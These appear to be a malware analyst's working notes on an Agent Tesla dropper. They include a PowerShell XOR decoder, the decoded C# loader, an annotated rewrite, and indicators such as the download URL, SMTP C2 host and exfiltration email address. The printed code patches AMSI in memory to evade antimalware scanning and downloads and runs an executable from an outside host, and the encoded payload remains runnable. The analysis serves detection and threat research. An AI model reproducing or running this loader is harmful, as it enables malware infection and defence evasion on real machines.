88cd18b7fbe649bd756b3034525f34c3
function funcDecodeNetClassSourceCode { param($paramEncodedNetClassSourceCode) $xorKey='s7c5f8'; $varDecodedNetClassSourceCode=''; for ($i=0; $i -lt $paramEncodedNetClassSourceCode.length; $i+=2){ $varEncodedHexBytes=[convert]::ToByte($paramEncodedNetClassSourceCode.Substring($i,2),16); $varDecodedChar=[char]($varEncodedHexBytes -bxor $xorKey[($i/2)%$xorKey.length]); # write-host ("Encoded: {0} , Decoded: {1}" -f ($varEncodedHexBytes, $varDecodedChar)) # watch every character get xor decoded $varDecodedNetClassSourceCode+=$varDecodedChar } return $varDecodedNetClassSourceCode; } $varEncodedNetClassSourceCode = '06440a5b0118204e104103554842105c085f53641a46125d1e193140084c1a5a061b2f560752115a166b1645155c055d000c16460f561417304c154c165a4d710f5914590c4612511044584015511d5043661f4b07520e1b2f774842105c085f53641a46125d1e192d5012037e3d134004541a5443560a590044434c05014700054e3d7c1f5b2a58165701434b170d5d01590659550a511b265b124a0a670c5c084c4e152450126801580074025c0152104644112e4716570a5110171041074c1a5443501e4c16450d152f5607671747465d460e540105103a591765124a5352060005005f4417470f5614171756500d110f071c5d63375b0f7c0b481c45171d445316450d500a0b41154f70084c014e335a0f56070a41790959177b0a571459014e411c3b4806550f5c0518004302410f5b53521b41034a1d172a5b1268074543475f5d150e551d154c015e0d52464f42535b065e11486c27590a711e470c471210515c0647085d1f0451174a7d1d43114c36571a591708446e1a451740075423450c41035b07154a68164d115b0a56464b0756175c0518164f1750145653550c5a0a1802015a0754595b7e0d41364c01171206525b1704561933711d433341141817565a54505e421b165c084c53515753505b5f581641464d1a591715035d120507544f0328730f592f55035811414e1a3852115b035440054d510a54511b265b124a0a670c5c084c4e1531410a751c41067803551c451a174a6b16432f54154c3645115a140515560f4603112e44175412511017064d125d015943430951171712545e0f4403001d2f560767174746504b550751050e5f7e0d41364c01170000055c121b0a5b121809555b045500171e5845135a1f5e0015154c12430a5646511d43435b000b4456021d4f433a591765124a535d0500570c4e455a500001451f1407040d16524b17570a46565205535b470f5656575e4655411c4f031a514b5f000d420342082f5607671747486216450c1c1d711d43334114181d00540c050516025a02525b5b5d0500570c5f405157535d161f4106540d12065300050b46020104540d4a055201560843020604500c46154a1c5d51151f0d02510110165e7c084c2343111b3c5d01584a4e33711d43334114180253000253055b622a5b126807454a005d4d1a591715175b465157025b08485e051d170e4a0551544e5644005a564a49175454004a080b035319094d07171256535e47004a1c1d7a0a43066e3b18100f0756070508071b065714434f05534a080b0e53485d711d4333411418160f550602053e5611460e591f1922590a57107f2459095a125b4b064f033e5611460e591f19205a16415b545b5105595f074f505e0e40534f064f0302565b02510c101f0d5011183a591765124a5b5954025f5b5d630c7c084c45034b1c4d080b07530404115f525b03555c5f044a0e1b450e4417470f5614171057500b440a265b105101580d58035607192450127e1c5b0750146812430b1d2356055e115a08551659171b354816540a540a7e1c5b07501416324713590f5b12430a5a087c1243021c461353153f69005c400e50575e1a531c4342545a4652061d440d17025104040d43154a0e085d04173450047b1f5e065b12105a19275a11561f58025120511f524b42545a4652061d440911035004510c46020004510d10025204500d41070501050944025105540d45075401040941065a04570d12035a01000840060205560d12075b01050945025a045109120650015e0947035605540d42075004510946020605000d43065604510910025605070911075001560945154a19155a4504541c5d6801580050154b2043024712711d510c151e5b11020508085d04173347095b16441066125901432a5b00575b440103550f5a0c3347095b1644101b354c1245171d1e5b1102051c5d4a164316470818430c1e45135a1f5e0015154c12430a56464b07450a5b011804050100035d5b4417470f56141717505f5b411e1846124a1a590415035d46545b08444b445456535e1a484417470f561417110c035e4a015e1744031558111d0f5607170a085603535e5f41030110054d79035614430b0e0f134e054a4e04410752435053014403000825571d41064712162758214c125d5b43060c050a5d641657154c015e0d524e515f054a19570e5a0c110c035e4a0148084e5b1b56111c4e5d460e54010566165256565e635b5e4c074f1d165256565e163f520d5212502e1e5848145d0742115b464a4a52050c50030e4a'; $varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode); write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode) # Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session # [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class --------------------- Results --------------------- Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N et; public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da) ;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5 cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77 9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692 2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863 d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder. ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b 1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for (int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le ngth]);}return r9ef96;}}
https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/ 88cd18b7fbe649bd756b3034525f34c3 using System; using System.Runtime.InteropServices; using System.Diagnostics; using System.IO; using System.Net; # [yc947f]::nf37aa() # malicious entry point public class yc947f{ [DllImport("kernel32",EntryPoint="GetProcAddress")] public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName); [DllImport("kernel32",EntryPoint="LoadLibrary")] public static extern IntPtr funcKernel32LoadLibrary(string paramDllName); [DllImport("kernel32",EntryPoint="VirtualProtect")] public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue); [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)] static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes); public static int nf37aa(){ # malicious entry point, patching AMSI Dll and a C# downloader string varDllName = funcDecodeString("125a105c485c1f5b"); Console.WriteLine(String.Format("Dll: {0}", varDllName)); IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName); if(varHandleToDll!=IntPtr.Zero){ string varFunctionName = funcDecodeString("325a105c355b12592140005e1645"); Console.WriteLine(String.Format("Function: {0}", varFunctionName)); IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName); if(varHandleToFunction!=IntPtr.Zero){ UIntPtr varMemorySize=(UIntPtr)5; uint varOldProtectValue=0; if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){ Byte[] var3BytesToCopy={0x31,0xff,0x90}; IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3); Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3); # funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); # overwrite bytes in function } } } string varFileName = funcDecodeString("5d521b50"); Console.WriteLine(String.Format("File: {0}", varFileName)); string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName; Console.WriteLine(String.Format("Path: {0}", varFileFullPath)); string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"); Console.WriteLine(String.Format("Url: {0}", varUrl)); new WebClient().DownloadFile(varUrl,varFileFullPath); # download the malware ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath); # Process.Start(varProcessToRun); # run the malware return 0; } public static string funcDecodeString(string paramEncodedString){ string varXorKey="s7c5f8"; string varDecodedString=""; for (int i=0; i<paramEncodedString.Length; i+=2){ byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16); varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]); } return varDecodedString; } }
Dll: amsi.dll Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe Agent Tesla c2 terminal6.veeblehosting.com tcp port 587 https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community
agent tesla https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE smtp port 587 "terminal6.veeblehosting.com" "obi@a-t-mould.com" {obi@a-t-mould.com} {obi@a-t-mould.com}